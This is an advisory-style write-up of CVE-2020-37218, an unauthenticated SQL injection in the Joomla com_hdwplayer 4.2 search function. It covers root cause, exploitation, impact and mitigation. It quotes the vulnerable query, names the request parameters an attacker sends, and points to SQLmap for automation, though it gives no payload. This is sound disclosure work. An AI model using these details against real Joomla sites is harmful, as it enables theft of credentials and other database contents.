CVE-2020-37218

Root

Cause

CVE-2020-37218 is an SQL injection vulnerability in the Joomla component com_hdwplayer version 4.2. The issue resides in the models/search.php file, specifically in the getsearch function at line 33. The application directly concatenates the user-supplied hdwplayersearch POST parameter into an SQL query without proper sanitization or parameterized queries [1][2]. The vulnerable query is:

SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')

Exploitation

An attacker can exploit this vulnerability by sending a crafted POST request to the Joomla index page with parameters option=com_hdwplayer, view=search, and a malicious hdwplayersearch value. No authentication is required, and the attack can be performed remotely over the network [2]. The hdwplayersearch parameter is directly obtained via JRequest::getVar() as a string, which does not perform any input validation, making the injection trivial [1]. Tools like SQLmap can automate the exploitation process [1].

Impact

Successful exploitation allows an unauthenticated attacker to execute arbitrary SQL queries against the underlying MySQL database. This can lead to extraction of sensitive information from the hdwplayer_videos table, and potentially other tables in the database, depending on the database permissions. The confidentiality impact is high, while integrity impact is low and availability impact is none [2]. An attacker could retrieve user credentials, session tokens, or other confidential data stored in the Joomla database.

Mitigation

As of the referenced advisories, no official patch has been released for this vulnerability. Users are advised to disable or remove the com_hdwplayer component until a fix is available [1]. Alternatively, input validation and the use of prepared statements should be implemented by the vendor to prevent SQL injection.